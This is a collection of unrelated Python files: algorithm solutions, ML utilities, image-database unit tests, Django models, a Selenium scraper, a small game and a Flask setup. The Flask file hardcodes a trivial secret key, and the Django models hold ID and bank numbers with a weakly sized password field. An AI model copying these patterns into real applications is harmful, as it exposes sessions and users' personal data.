x_values = curve[:, 0]
values = curve[:, 1:]
elif curve.ndim == 1 and numpy.floor(curve[0]) == curve[0]: # new format but only one entry
x_values = curve[None, 0]
values = curve[None, 1:]
else:
values = curve[:, None]
x_values = numpy.arange(len(values))
if x == 'time':
assert x == 'time', f"x must be 'steps' or 'time' but got {x}"
ML_LOGGER.debug(f"Reading {os.path.join(scene.path, 'log_step_time.txt')}")
_, x_values, *_ = numpy.loadtxt(os.path.join(scene.path, "log_step_time.txt")).T
values = values[:len(x_values + 1)]
x_values = numpy.cumsum(x_values[:len(values) - 1])
x_values = numpy.concatenate([[0.], x_values])
x_values = wrap(x_values, entries_dim)
values = wrap(values, entries_dim, batch_dim)
if x is not None:
return math.stack([x_values, values], channel(vector=[x, name]))
return values
|
class Solution:
def maxProfit(self, prices: List[int]) -> int:
memo = {}
def act(i, buy):
if i >= len(prices):
return 0
if (i, buy) in memo:
return memo[(i, buy)]
if buy:
memo[(i, buy)] = max(act(i+1, False)-prices[i], act(i+1, True))
else:
memo[(i, buy)] = max(act(i+2, True)+prices[i], act(i+1, False))
return memo[(i, buy)]
res = act(0, True)
return res
|
import numpy as np
import torch
import scipy.io as sio
from generate_environment import environment
import argparse
#### Samples for training propagation with changing source pixels
# Note: There are two version
def generateSamples(N, numTraining, steps):
# Parameters for environment generation
N2 = N**2
p = 0.15
# Set up the tensors to store the
trainEnv = np.zeros((numTraining, N2))
trainPred = np.zeros((numTraining, N2))
trainPredRange = np.zeros((numTraining, N2))
runMax = np.ceil(numTraining*0.55)
hideMax = np.ceil(numTraining*0.55)
j = 0
while(j < numTraining):
X, prey, predator, cave = environment(N, p)
# Label is 0 if cave is closer to prey (also equivalent to non-accessible to predator)
# Label is 1 if cave is closer to predator OR non-accessible to either
# These form the two different stopping conditions
# Diff tracks when we've filled the whole space
# Stop tracks when one of the ranges includes the cave
# Label get set initially to 1, the proper value if the cave is in neither range
# Set up predator range
predatorRange = np.zeros((N,N))
row_predator, col_predator = np.nonzero(predator)
l = len(row_predator)
rowNext_predator = []
colNext_predator = []
for i in range(0, l):
predatorRange[row_predator[i], col_predator[i]] = 1
rowNext_predator.append(row_predator[i])
colNext_predator.append(col_predator[i])
row_predator = []
col_predator = []
q = 0
while(q < steps):
# Propagate predator
predatorRange_Old = predatorRange[:,:]
del row_predator[:]
del col_predator[:]
row_predator = rowNext_predator[:]
col_predator = colNext_predator[:]
l = len(row_predator)
del rowNext_predator[:]
del colNext_predator[:]
for i in range(0, l):
row_current = row_predator[i]
col_current = col_predator[i]
if ((row_current != 0) and (X[(row_current - 1), col_current] == 0) and (predatorRange[(row_current - 1), col_current] == 0)):
predatorRange[row_current - 1, col_current] = 1
rowNext_predator.append(row_current - 1)
colNext_predator.append(col_current)
if ((row_current != N-1) and (X[row_current + 1, col_current] == 0) and (predatorRange[(row_current + 1), col_current] == 0)):
predatorRange[row_current + 1, col_current] = 1
rowNext_predator.append(row_current + 1)
colNext_predator.append(col_current)
if ((col_current != 0) and (X[row_current, col_current-1] == 0) and (predatorRange[row_current, col_current-1] == 0)):
predatorRange[row_current, col_current-1] = 1
rowNext_predator.append(row_current)
colNext_predator.append(col_current-1)
if ((col_current != N-1) and (X[row_current, col_current+1] == 0) and (predatorRange[row_current, col_current+1] == 0)):
predatorRange[row_current, col_current+1] = 1
rowNext_predator.append(row_current)
colNext_predator.append(col_current+1)
q = q+1
#print(q)
# Change everything to +1/-1
Xvec = np.reshape(X, (1, N2))
Xvec = 1 - Xvec
Xvec[Xvec == 0] = -1
predVec = np.reshape(predator, (1, N2))
predVec[predVec == 0] = -1
predRangeVec = np.reshape(predatorRange, (1, N2))
predRangeVec[predRangeVec == 0] = -1
trainEnv[j, :] = Xvec
trainPred[j, :] = predVec
trainPredRange[j, :] = predRangeVec
j = j+1
# if (j % 1000 == 0):
# print(j)
# Once all the samples are generated, return dictionary of samples
trainEnv = torch.from_numpy(trainEnv)
trainPred = torch.from_numpy(trainPred)
trainPredRange = torch.from_numpy(trainPredRange)
sampleDict = {"Environment": trainEnv, "Predator": trainPred, "Range": trainPredRange}
return sampleDict
# # Look at the output
# fig1, ax = plt.subplots(2, 3)
# ax[0, 0].imshow(X, cmap='Greys', interpolation='none')
# ax[0, 1].imshow(prey, cmap='Greys', interpolation='none')
# ax[0, 2].imshow(predator, cmap='Greys', interpolation='none')
# ax[1, 0].imshow(cave, cmap='Greys', interpolation='none')
# ax[1, 1].imshow(preyRange, cmap='Greys', interpolation='none')
# ax[1, 2].imshow(predatorRange, cmap='Greys', interpolation='none')
# print(label)
# plt.show()
# fig1.savefig('sample_label.pdf', bbox_inches = 'tight')
|
# Definition for singly-linked list.
# class ListNode:
# def __init__(self, x):
# self.val = x
# self.next = None
class Solution:
# @param A : head node of linked list
# @return the head node in the linked list
def swapPairs(self, A):
if not A or not A.next:
return A
head = A.next
A.next = A.next.next
head.next = A
current = A
while current.next and current.next.next:
temp = current.next.next.next
current.next, current.next.next = current.next.next, current.next
current.next.next.next = temp
current = current.next.next
return head
|
#Author: James Nicholson
#Date: 5/30/2018
#Ask the user for a number.
# Depending on whether the number is even or odd,
# print out an appropriate message to the user.
num = int(input("Enter a number: "))
mod = num % 2
if mod > 0:
print("Number is odd.")
else:
print("Number is even")
#End Script
|
import unittest
import testutil
import shutil
import os
import hdbfs.ark
import hdbfs.imgdb
PRI_THUMB = 1000
PRI_DATA = 2000
class ImgDbCases( testutil.TestCase ):
def setUp( self ):
self.init_env()
data_config = hdbfs.imgdb.ImageDbDataConfig( self.db_path )
self.idb = hdbfs.ark.StreamDatabase( data_config )
def tearDown( self ):
self.uninit_env()
def test_imgdat_structure( self ):
red = self._load_data( self.red )
green = self._load_data( self.green )
self.idb.load_data( red, 0x123, PRI_DATA, 'png' )
self.idb.load_data( green, 0xabc, PRI_DATA, 'dat' )
# Should not be moved before commit
self.assertTrue( os.path.exists( red ),
'Image moved before commit' )
self.idb.commit()
self.assertFalse( os.path.exists( red ),
'Old image was not removed' )
self.assertTrue( os.path.isdir(
os.path.join( self.db_path, 'imgdat/000/000' ) ),
'Image data directory not created' )
self.assertTrue( os.path.isfile(
os.path.join( self.db_path,
'imgdat/000/000/0000000000000123.png' ) ),
'Image file moved to incorrect location' )
self.assertTrue( os.path.isfile(
os.path.join( self.db_path,
'imgdat/000/000/0000000000000abc.dat' ) ),
'Image file moved to incorrect location' )
red_fd = self.idb.read( 0x123, PRI_DATA, 'png' )
self.assertTrue( self._diff_data( red_fd, self.red ),
'Image not read properly from library' )
uk_fd = self.idb.read( 0xabc, PRI_DATA, 'png' )
self.assertTrue( uk_fd is None,
'Missing file somehow read from library' )
def test_tbdat_structure( self ):
red = self._load_data( self.red )
self.idb.load_data( red, 0x123, PRI_THUMB, 'png' )
# Should not be moved before commit
self.assertTrue( os.path.exists( red ),
'Image moved before commit' )
self.idb.commit()
self.assertFalse( os.path.exists( red ),
'Old image was not removed' )
self.assertTrue( os.path.isdir(
os.path.join( self.db_path, 'tbdat/000/000' ) ),
'Image data directory not created' )
self.assertTrue( os.path.isfile(
os.path.join( self.db_path,
'tbdat/000/000/0000000000000123.png' ) ),
'Image file moved to incorrect location' )
red_fd = self.idb.read( 0x123, PRI_THUMB, 'png' )
self.assertTrue( self._diff_data( red_fd, self.red ),
'Image not read properly from library' )
uk_fd = self.idb.read( 0xabc, PRI_THUMB, 'png' )
self.assertTrue( uk_fd is None,
'Missing file somehow read from library' )
def test_multiple_folders( self ):
red = self._load_data( self.red )
yellow = self._load_data( self.yellow )
green = self._load_data( self.green )
cyan = self._load_data( self.cyan )
blue = self._load_data( self.blue )
magenta = self._load_data( self.magenta )
self.idb.load_data( red, 0x123, PRI_DATA, 'png' )
self.idb.load_data( yellow, 0xabc, PRI_THUMB, 'png' )
self.idb.load_data( green, 0xdef, PRI_DATA, 'png' )
self.idb.load_data( cyan, 0x123abc, PRI_DATA, 'png' )
self.idb.load_data( blue, 0xabc123abc, PRI_THUMB, 'png' )
self.idb.load_data( magenta, 0xabc123def, PRI_DATA, 'png' )
self.idb.commit()
self.assertTrue( os.path.isdir(
os.path.join( self.db_path, 'imgdat/000/000' ) ),
'Image data directory 000 not created' )
self.assertTrue( os.path.isdir(
os.path.join( self.db_path, 'tbdat/000/000' ) ),
'Thumb data directory 000 not created' )
self.assertTrue( os.path.isdir(
os.path.join( self.db_path, 'imgdat/000/123' ) ),
'Image data directory 123 not created' )
self.assertTrue( os.path.isdir(
os.path.join( self.db_path, 'imgdat/abc/123' ) ),
'Image data directory abc/123 not created' )
self.assertTrue( os.path.isdir(
os.path.join( self.db_path, 'tbdat/abc/123' ) ),
'Thumb data directory abc/123 not created' )
self.assertTrue( os.path.isfile(
os.path.join( self.db_path,
'imgdat/000/000/0000000000000123.png' ) ),
'Image file 123 moved to incorrect location' )
self.assertTrue( os.path.isfile(
os.path.join( self.db_path,
'tbdat/000/000/0000000000000abc.png' ) ),
'Image file abc moved to incorrect location' )
self.assertTrue( os.path.isfile(
os.path.join( self.db_path,
'imgdat/000/000/0000000000000def.png' ) ),
'Image file def moved to incorrect location' )
self.assertTrue( os.path.isfile(
os.path.join( self.db_path,
'imgdat/000/123/0000000000123abc.png' ) ),
'Image file 123abc moved to incorrect location' )
self.assertTrue( os.path.isfile(
os.path.join( self.db_path,
'tbdat/abc/123/0000000abc123abc.png' ) ),
'Image file abc123abc moved to incorrect location' )
self.assertTrue( os.path.isfile(
os.path.join( self.db_path,
'imgdat/abc/123/0000000abc123def.png' ) ),
'Image file abc123def moved to incorrect location' )
red_fd = self.idb.read( 0x123, PRI_DATA, 'png' )
self.assertTrue( self._diff_data( red_fd, self.red ),
'Image 123 not read properly from library' )
yellow_fd = self.idb.read( 0xabc, PRI_THUMB, 'png' )
self.assertTrue( self._diff_data( yellow_fd, self.yellow ),
'Image not read properly from library' )
green_fd = self.idb.read( 0xdef, PRI_DATA, 'png' )
self.assertTrue( self._diff_data( green_fd, self.green ),
'Image not read properly from library' )
cyan_fd = self.idb.read( 0x123abc, PRI_DATA, 'png' )
self.assertTrue( self._diff_data( cyan_fd, self.cyan ),
'Image not read properly from library' )
blue_fd = self.idb.read( 0xabc123abc, PRI_THUMB, 'png' )
self.assertTrue( self._diff_data( blue_fd, self.blue ),
'Image not read properly from library' )
magenta_fd = self.idb.read( 0xabc123def, PRI_DATA, 'png' )
self.assertTrue( self._diff_data( magenta_fd, self.magenta ),
'Image not read properly from library' )
def test_commit_and_rollback( self ):
# State should be clean on start-up
self.assertEquals( self.idb.get_state(), 'clean',
'Database not clean on start-up' )
red = self._load_data( self.red )
self.idb.load_data( red, 0x123, PRI_DATA, 'png' )
self.assertEquals( self.idb.get_state(), 'dirty',
'Database not dirty after load' )
# Should not be moved before commit
self.assertTrue( os.path.exists( red ),
'Image moved before commit' )
self.idb.prepare_commit()
self.assertFalse( os.path.exists( red ),
'Image not moved after prepare' )
self.assertEquals( self.idb.get_state(), 'prepared',
'Database not prepared after prepare' )
self.idb.unprepare_commit()
self.assertTrue( os.path.exists( red ),
'Image not returned after unprepare' )
self.assertEquals( self.idb.get_state(), 'dirty',
'Database not clean after unprepare' )
self.idb.prepare_commit()
self.assertFalse( os.path.exists( red ),
'Image not moved after prepare/unprepare/prepare' )
self.assertEquals( self.idb.get_state(), 'prepared',
'Database not prepared after prepare/unprepare/prepare' )
def test_hard_single_vol( self ):
# State should be clean on start-up
self.assertEquals( self.idb.get_state(), 'clean',
'Database not clean on start-up' )
red = self._load_data( self.red )
yellow = self._load_data( self.yellow )
green = self._load_data( self.green )
self.idb.load_data( red, 0x1, PRI_DATA, 'png' )
self.idb.commit()
self.idb.load_data( yellow, 0x2, PRI_THUMB, 'png' )
self.idb.prepare_commit()
self.assertTrue( os.path.isfile(
os.path.join( self.db_path,
'imgdat/000/000/0000000000000001.png' ) ),
'File 0x1 missing' )
self.assertTrue( os.path.isfile(
os.path.join( self.db_path,
'tbdat/000/000/0000000000000002.png' ) ),
'File 0x2 missing' )
self.idb.unprepare_commit()
self.assertTrue( os.path.isfile(
os.path.join( self.db_path,
'imgdat/000/000/0000000000000001.png' ) ),
'File 0x1 missing after rollback' )
self.assertFalse( os.path.isfile(
os.path.join( self.db_path,
'tbdat/000/000/0000000000000002.png' ) ),
'File 0x2 present when should have been removed' )
self.idb.load_data( green, 0x3, PRI_DATA, 'png' )
self.idb.prepare_commit()
self.assertTrue( os.path.isfile(
os.path.join( self.db_path,
'imgdat/000/000/0000000000000001.png' ) ),
'File 0x1 missing after 3rd commit' )
self.assertTrue( os.path.isfile(
os.path.join( self.db_path,
'tbdat/000/000/0000000000000002.png' ) ),
'File 0x2 not re-instated after 3rd commit' )
self.assertTrue( os.path.isfile(
os.path.join( self.db_path,
'imgdat/000/000/0000000000000003.png' ) ),
'File 0x3 added by 3rd commit' )
self.idb.rollback()
self.assertTrue( os.path.isfile(
os.path.join( self.db_path,
'imgdat/000/000/0000000000000001.png' ) ),
'File 0x1 missing after 2nd rollback' )
self.assertFalse( os.path.isfile(
os.path.join( self.db_path,
'tbdat/000/000/0000000000000002.png' ) ),
'File 0x2 not removed by 2nd rollback' )
self.assertFalse( os.path.isfile(
os.path.join( self.db_path,
'imgdat/000/000/0000000000000003.png' ) ),
'File 0x3 not removed by 2nd rollback' )
self.assertEqual( self.idb.get_state(), 'clean',
'Reset state did not reset state to clean' )
self.idb.load_data( green, 0x3, PRI_DATA, 'png' )
self.idb.commit()
self.assertTrue( os.path.isfile(
os.path.join( self.db_path,
'imgdat/000/000/0000000000000001.png' ) ),
'File 0x1 missing after 4th commit' )
self.assertFalse( os.path.isfile(
os.path.join( self.db_path,
'tbdat/000/000/0000000000000002.png' ) ),
'File 0x2 brought back after reset and commit' )
self.assertTrue( os.path.isfile(
os.path.join( self.db_path,
'imgdat/000/000/0000000000000003.png' ) ),
'File 0x3 not re-added by 4th commit' )
def test_hard_multi_vol( self ):
# State should be clean on start-up
self.assertEquals( self.idb.get_state(), 'clean',
'Database not clean on start-up' )
red = self._load_data( self.red )
yellow = self._load_data( self.yellow )
green = self._load_data( self.green )
self.idb.load_data( red, 0x1001, PRI_DATA, 'png' )
self.idb.commit()
self.idb.load_data( yellow, 0x2001, PRI_DATA, 'png' )
self.idb.prepare_commit()
self.assertTrue( os.path.isfile(
os.path.join( self.db_path,
'imgdat/000/001/0000000000001001.png' ) ),
'File 0x1001 missing' )
self.assertTrue( os.path.isfile(
os.path.join( self.db_path,
'imgdat/000/002/0000000000002001.png' ) ),
'File 0x2001 missing' )
self.idb.unprepare_commit()
self.assertTrue( os.path.isfile(
os.path.join( self.db_path,
'imgdat/000/001/0000000000001001.png' ) ),
'File 0x1001 missing after rollback' )
self.assertFalse( os.path.isfile(
os.path.join( self.db_path,
'imgdat/000/002/0000000000002001.png' ) ),
'File 0x2001 present when should have been removed' )
self.idb.load_data( green, 0x3001, PRI_DATA, 'png' )
self.idb.prepare_commit()
self.assertTrue( os.path.isfile(
os.path.join( self.db_path,
'imgdat/000/001/0000000000001001.png' ) ),
'File 0x1001 missing after 3rd commit' )
self.assertTrue( os.path.isfile(
os.path.join( self.db_path,
'imgdat/000/002/0000000000002001.png' ) ),
'File 0x2001 not re-instated after 3rd commit' )
self.assertTrue( os.path.isfile(
os.path.join( self.db_path,
'imgdat/000/003/0000000000003001.png' ) ),
'File 0x3001 added by 3rd commit' )
self.idb.rollback()
self.assertTrue( os.path.isfile(
os.path.join( self.db_path,
'imgdat/000/001/0000000000001001.png' ) ),
'File 0x1001 missing after 2nd rollback' )
self.assertFalse( os.path.isfile(
os.path.join( self.db_path,
'imgdat/000/002/0000000000002001.png' ) ),
'File 0x2001 not removed by 2nd rollback' )
self.assertFalse( os.path.isfile(
os.path.join( self.db_path,
'imgdat/000/003/0000000000003001.png' ) ),
'File 0x3001 not removed by 2nd rollback' )
self.assertEqual( self.idb.get_state(), 'clean',
'Reset state did not reset state to clean' )
self.idb.load_data( green, 0x3001, PRI_DATA, 'png' )
self.idb.commit()
self.assertTrue( os.path.isfile(
os.path.join( self.db_path,
'imgdat/000/001/0000000000001001.png' ) ),
'File 0x1001 missing after 4th commit' )
self.assertFalse( os.path.isfile(
os.path.join( self.db_path,
'imgdat/000/002/0000000000002001.png' ) ),
'File 0x2001 brought back after reset and commit' )
self.assertTrue( os.path.isfile(
os.path.join( self.db_path,
'imgdat/000/003/0000000000003001.png' ) ),
'File 0x3001 not re-added by 4th commit' )
def test_hard_multi_pri( self ):
# State should be clean on start-up
self.assertEquals( self.idb.get_state(), 'clean',
'Database not clean on start-up' )
red = self._load_data( self.red )
yellow = self._load_data( self.yellow )
green = self._load_data( self.green )
self.idb.load_data( red, 0x1001, PRI_DATA, 'png' )
self.idb.commit()
self.idb.load_data( yellow, 0x1002, PRI_THUMB, 'png' )
self.idb.prepare_commit()
self.assertTrue( os.path.isfile(
os.path.join( self.db_path,
'imgdat/000/001/0000000000001001.png' ) ),
'File 0x1001 missing' )
self.assertTrue( os.path.isfile(
os.path.join( self.db_path,
'tbdat/000/001/0000000000001002.png' ) ),
'File 0x1002 missing' )
self.idb.unprepare_commit()
self.assertTrue( os.path.isfile(
os.path.join( self.db_path,
'imgdat/000/001/0000000000001001.png' ) ),
'File 0x1001 missing after rollback' )
self.assertFalse( os.path.isfile(
os.path.join( self.db_path,
'tbdat/000/001/0000000000001002.png' ) ),
'File 0x1002 present when should have been removed' )
self.idb.load_data( green, 0x3001, PRI_DATA, 'png' )
self.idb.prepare_commit()
self.assertTrue( os.path.isfile(
os.path.join( self.db_path,
'imgdat/000/001/0000000000001001.png' ) ),
'File 0x1001 missing after 3rd commit' )
self.assertTrue( os.path.isfile(
os.path.join( self.db_path,
'tbdat/000/001/0000000000001002.png' ) ),
'File 0x2001 not re-instated after 3rd commit' )
self.assertTrue( os.path.isfile(
os.path.join( self.db_path,
'imgdat/000/003/0000000000003001.png' ) ),
'File 0x3001 added by 3rd commit' )
self.idb.rollback()
self.assertTrue( os.path.isfile(
os.path.join( self.db_path,
'imgdat/000/001/0000000000001001.png' ) ),
'File 0x1001 missing after 2nd rollback' )
self.assertFalse( os.path.isfile(
os.path.join( self.db_path,
'tbdat/000/001/0000000000001002.png' ) ),
'File 0x2001 not removed by 2nd rollback' )
self.assertFalse( os.path.isfile(
os.path.join( self.db_path,
'imgdat/000/003/0000000000003001.png' ) ),
'File 0x3001 not removed by 2nd rollback' )
self.assertEqual( self.idb.get_state(), 'clean',
'Reset state did not reset state to clean' )
self.idb.load_data( green, 0x3001, PRI_DATA, 'png' )
self.idb.commit()
self.assertTrue( os.path.isfile(
os.path.join( self.db_path,
'imgdat/000/001/0000000000001001.png' ) ),
'File 0x1001 missing after 4th commit' )
self.assertFalse( os.path.isfile(
os.path.join( self.db_path,
'tbdat/000/001/0000000000001002.png' ) ),
'File 0x2001 brought back after reset and commit' )
self.assertTrue( os.path.isfile(
os.path.join( self.db_path,
'imgdat/000/003/0000000000003001.png' ) ),
'File 0x3001 not re-added by 4th commit' )
def test_rollback_then_commit( self ):
self.assertEquals( self.idb.get_state(), 'clean',
'Database not clean on start-up' )
red = self._load_data( self.red )
self.idb.load_data( red, 0x123, PRI_DATA, 'png' )
self.assertEquals( self.idb.get_state(), 'dirty',
'Database not dirty after load' )
self.assertTrue( os.path.exists( red ),
'Image moved before commit' )
self.idb.rollback()
self.assertTrue( os.path.exists( red ),
'Image moved after no-commit-rollback' )
self.assertEquals( self.idb.get_state(), 'clean',
'Database not clean after rollback' )
self.idb.commit()
self.assertTrue( os.path.exists( red ),
'Image moved after rollback before commit' )
self.assertEquals( self.idb.get_state(), 'clean',
'Database not clean after rollback then commit' )
def test_commit_failure( self ):
self.assertEquals( self.idb.get_state(), 'clean',
'Database not clean on start-up' )
red = self._load_data( self.red )
self.idb.load_data( red, 0x123, PRI_DATA, 'png' )
os.remove( red )
try:
self.idb.commit()
self.fail( 'Commit succeeded on missing file' )
except:
pass
self.assertEquals( self.idb.get_state(), 'dirty',
'Database not dirty after failed commit' )
def test_commit_failure_rollback_single_volume( self ):
self.assertEquals( self.idb.get_state(), 'clean',
'Database not clean on start-up' )
red = self._load_data( self.red )
yellow = self._load_data( self.yellow )
green = self._load_data( self.green )
self.idb.load_data( red, 0x1, PRI_DATA, 'png' )
self.idb.load_data( yellow, 0x2, PRI_DATA, 'png' )
self.idb.load_data( green, 0x3, PRI_DATA, 'png' )
os.remove( yellow )
try:
self.idb.commit()
self.fail( 'Commit succeeded on missing file' )
except:
pass
self.assertTrue( os.path.exists( red ),
'File 0x1 not rolled back on failed commit' )
self.assertTrue( os.path.exists( green ),
'File 0x3 not rolled back on failed commit' )
def test_commit_failure_rollback_multi_volume( self ):
self.assertEquals( self.idb.get_state(), 'clean',
'Database not clean on start-up' )
red = self._load_data( self.red )
yellow = self._load_data( self.yellow )
green = self._load_data( self.green )
self.idb.load_data( red, 0x1001, PRI_DATA, 'png' )
self.idb.load_data( yellow, 0x2001, PRI_DATA, 'png' )
self.idb.load_data( green, 0x3001, PRI_DATA, 'png' )
os.remove( yellow )
try:
self.idb.commit()
self.fail( 'Commit succeeded on missing file' )
except:
pass
self.assertTrue( os.path.exists( red ),
'File 0x1001 not rolled back on failed commit' )
self.assertTrue( os.path.exists( green ),
'File 0x3001 not rolled back on failed commit' )
def test_delete( self ):
# State should be clean on start-up
self.assertEquals( self.idb.get_state(), 'clean',
'Database not clean on start-up' )
red = self._load_data( self.red )
green = self._load_data( self.green )
self.idb.load_data( red, 0x123, PRI_DATA, 'png' )
self.idb.load_data( green, 0xabc, PRI_THUMB, 'png' )
self.idb.commit()
self.idb.delete( 0x123, PRI_DATA, 'png' )
self.idb.delete( 0xabc, PRI_THUMB, 'png' )
self.assertTrue( os.path.isfile(
os.path.join( self.db_path,
'imgdat/000/000/0000000000000123.png' ) ),
'Image file removed before commit' )
self.assertTrue( os.path.isfile(
os.path.join( self.db_path,
'tbdat/000/000/0000000000000abc.png' ) ),
'Thumb file removed before commit' )
self.idb.prepare_commit()
self.assertFalse( os.path.isfile(
os.path.join( self.db_path,
'imgdat/000/000/0000000000000123.png' ) ),
'Image file delete failed' )
self.assertFalse( os.path.isfile(
os.path.join( self.db_path,
'tbdat/000/000/0000000000000abc.png' ) ),
'Image file delete failed' )
self.idb.rollback()
self.assertTrue( os.path.isfile(
os.path.join( self.db_path,
'imgdat/000/000/0000000000000123.png' ) ),
'Image file rollback from delete failed' )
self.assertTrue( os.path.isfile(
os.path.join( self.db_path,
'tbdat/000/000/0000000000000abc.png' ) ),
'Image file rollback from delete failed' )
if( __name__ == '__main__' ):
unittest.main()
|
from django import forms
from lib.bootstrap_modal_forms.mixins import PopRequestMixin, CreateUpdateAjaxMixin
class BSModalForm(PopRequestMixin, forms.Form):
pass
class BSModalModelForm(PopRequestMixin, CreateUpdateAjaxMixin, forms.ModelForm):
pass
|
# encoding: utf-8
"""
@author: liaoxingyu
@contact: sherlockliao01@gmail.com
"""
from . import lr_scheduler
from . import optim
def build_optimizer(cfg, model):
params = []
for key, value in model.named_parameters():
if not value.requires_grad:
continue
lr = cfg.SOLVER.BASE_LR
weight_decay = cfg.SOLVER.WEIGHT_DECAY
if "heads" in key:
lr *= cfg.SOLVER.HEADS_LR_FACTOR
if "bias" in key:
lr *= cfg.SOLVER.BIAS_LR_FACTOR
weight_decay = cfg.SOLVER.WEIGHT_DECAY_BIAS
params += [{"params": [value], "lr": lr, "weight_decay": weight_decay}]
solver_opt = cfg.SOLVER.OPT
if hasattr(optim, solver_opt):
if solver_opt == "SGD":
opt_fns = getattr(optim, solver_opt)(params, momentum=cfg.SOLVER.MOMENTUM)
else:
opt_fns = getattr(optim, solver_opt)(params)
else:
raise NameError("optimizer {} not support".format(cfg.SOLVER.OPT))
return opt_fns
def build_lr_scheduler(cfg, optimizer):
if cfg.SOLVER.SCHED == "warmup":
return lr_scheduler.WarmupMultiStepLR(
optimizer,
cfg.SOLVER.STEPS,
cfg.SOLVER.GAMMA,
warmup_factor=cfg.SOLVER.WARMUP_FACTOR,
warmup_iters=cfg.SOLVER.WARMUP_ITERS,
warmup_method=cfg.SOLVER.WARMUP_METHOD
)
elif cfg.SOLVER.SCHED == "delay":
return lr_scheduler.DelayedCosineAnnealingLR(
optimizer,
cfg.SOLVER.DELAY_ITERS,
cfg.SOLVER.COS_ANNEAL_ITERS,
warmup_factor=cfg.SOLVER.WARMUP_FACTOR,
warmup_iters=cfg.SOLVER.WARMUP_ITERS,
warmup_method=cfg.SOLVER.WARMUP_METHOD
)
|
# movement can cause death
# Dungeon V 1
import time
import random
import YesNo
import upDownLeftRight
import loading
import runDirection
def Enter():
if YesNo.yesNo('Would you like to enter the dungeon?'):
for i in range(101):
print('Loading dungeonV01...', i, '%', sep='', end='\r', flush=True)
time.sleep((random.randint(1, 7)) / 50)
print('\n', end='')
if loading.loading('true', 1):
for i in 'Which direction would you like to go?':
time.sleep(0.05)
print(i, end='', flush=True)
if upDownLeftRight.upDownLeftRight('') is 90: # up
if runDirection.up() is False:
exit()
if upDownLeftRight.upDownLeftRight('') is 270: # down
if runDirection.down() is False:
pass
if upDownLeftRight.upDownLeftRight('') is 180: # left
if runDirection.left() is False:
pass
if upDownLeftRight.upDownLeftRight('') is 0: # right
if runDirection.right() is False:
pass
else:
for x in 'quitting...':
time.sleep(0.1)
print(x, sep='', end='', flush=True)
time.sleep(1.2)
Enter()
|
from django.db import models
# Create your models here.
class UserProfile(models.Model):
username = models.CharField(max_length=11, verbose_name='用户名', unique=True)
password = models.CharField(max_length=32, verbose_name='密码')
email = models.EmailField()
phone = models.CharField(max_length=11, verbose_name='手机号')
isActive = models.BooleanField(default=False, verbose_name='是否激活')
created_time = models.DateTimeField(auto_now_add=True)
updated_time = models.DateTimeField(auto_now=True)
class Meta:
db_table = 'user_profile'
def __str__(self):
return '%s_%s' %(self.username, self.isActive)
class WeiBoUser(models.Model):
uid = models.OneToOneField(UserProfile,null=True,on_delete=models.SET_NULL)#一对一
wuid = models.CharField(max_length=50,db_index=True)#索引
access_token = models.CharField(max_length=100)
class Meta:
db_table = 'weibo_user'
def __str__(self):
return '%s_%s'%(self.uid,self.wuid)
class account(models.Model):
user_id = models.IntegerField(max_length=11,verbose_name='用户Id',unique=True)
name = models.CharField(max_length=11, verbose_name='姓名')
id_card = models.CharField(max_length=18, verbose_name='身份证号',unique=True)
bank_id = models.IntegerField(max_length=3, verbose_name='所属银行' )
bank_no = models.IntegerField(max_length=19, verbose_name='银行卡号')
addr = models.CharField(max_length=1024, verbose_name='居住地址',default='')
is_opened = models.IntegerField(max_length=1,verbose_name='是否开户',default=0)
created_time = models.DateTimeField(auto_now_add=True)
updated_time = models.DateTimeField(auto_now=True)
class Meta:
db_table = 'account'
def __str__(self):
return '%s_%s' %(self.name, self.id_card)
|
from selenium import webdriver
import ctypes
class OpenFile:
def __init__(self, file_name: str, mode: str):
__tmp_file = open(file_name, 'r')
self.__tmp_file_content = __tmp_file.read()
__tmp_file.close()
self.__tmp_filename = file_name
try:
self.file_obj = open(file_name, mode)
except FileNotFoundError:
self.file_obj = open(file_name, 'w')
def __exit__(self, exc_type, exc_val, exc_tb):
self.file_obj.close()
if exc_type is None:
return True
tmp_file = open(self.__tmp_filename, 'w')
tmp_file.write(self.__tmp_file_content)
tmp_file.close()
return True
def __enter__(self):
return self.file_obj
class CurrencyExchange:
def __init__(self, this_currency: str, another_currency: str):
self.this_currency = this_currency
self.another_currency = another_currency
self.data_from_source: list
self.driver: webdriver
def create_url(self):
return f'https://exchangerates.org.uk/{self.this_currency}-{self.another_currency}-exchange-rate-history.html'
def open_driver_and_get_data(self):
self.driver = webdriver.Chrome()
self.driver.set_window_position(-2000, 0)
self.driver.get(self.create_url())
table_row = self.driver.find_elements_by_xpath('//*[@id="hd-maintable"]')
data = [[td.text for td in row.find_elements_by_class_name('colone') + row.find_elements_by_class_name('coltwo')] for row in table_row][0]
self.data_from_source = [f'{self.this_currency}/{self.another_currency},{a[-10:]},{a[a.find(f"{self.this_currency} = ") + 6:][:7]}' for a in data]
# self.data_from_source.sort()
def create_str_from_list(lst_to_str: list) -> str:
"""
create and return string, which return all values from list
:param lst_to_str: must be list type
:return: return str
"""
return ''.join(map(lambda x: '\n' + x, lst_to_str))[1:]
def refresh_data(currency_instance: CurrencyExchange, file_to_refresh_data: str):
currency_instance.open_driver_and_get_data()
with OpenFile(file_to_refresh_data, 'r') as file:
data_in_file = list(map(lambda x: x.replace("\n", ""), file.readlines()))
# data_in_file.sort()
with OpenFile(file_to_refresh_data, 'w') as file:
result_lst = data_in_file + list(set(currency_instance.data_from_source) - set(data_in_file))
# result_lst.sort()
file.write(create_str_from_list(result_lst))
currency_instance.driver.quit()
try:
usd_uah = CurrencyExchange('USD', 'UAH')
eur_uah = CurrencyExchange('EUR', 'UAH')
for i in (usd_uah, eur_uah):
refresh_data(i, 'ex.txt')
ctypes.windll.user32.MessageBoxW(0, 'Готово', 'Поновлення курсу валют', 1)
except:
ctypes.windll.user32.MessageBoxW(0, 'Сталась помилка! Файл не змінено', 'Поновлення курсу валют', 1)
|
from flask import Flask
from flask_sqlalchemy import SQLAlchemy
from sqlalchemy.sql import func
from flask_bcrypt import Bcrypt
from flask_migrate import Migrate
import stripe
import os
app = Flask(__name__)
stripe_keys = {
"secret_key": os.environ['STRIPE_SECRET_KEY'],
"publishable_key": os.environ['STRIPE_PUBLISHABLE_KEY']
}
stripe.api_key = stripe_keys['secret_key']
app.config['UPLOAD_FOLDER'] = './static/images/uploads'
app.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///user_dash.db'
app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False
app.secret_key = "LOL"
bcrypt = Bcrypt(app)
db = SQLAlchemy(app)
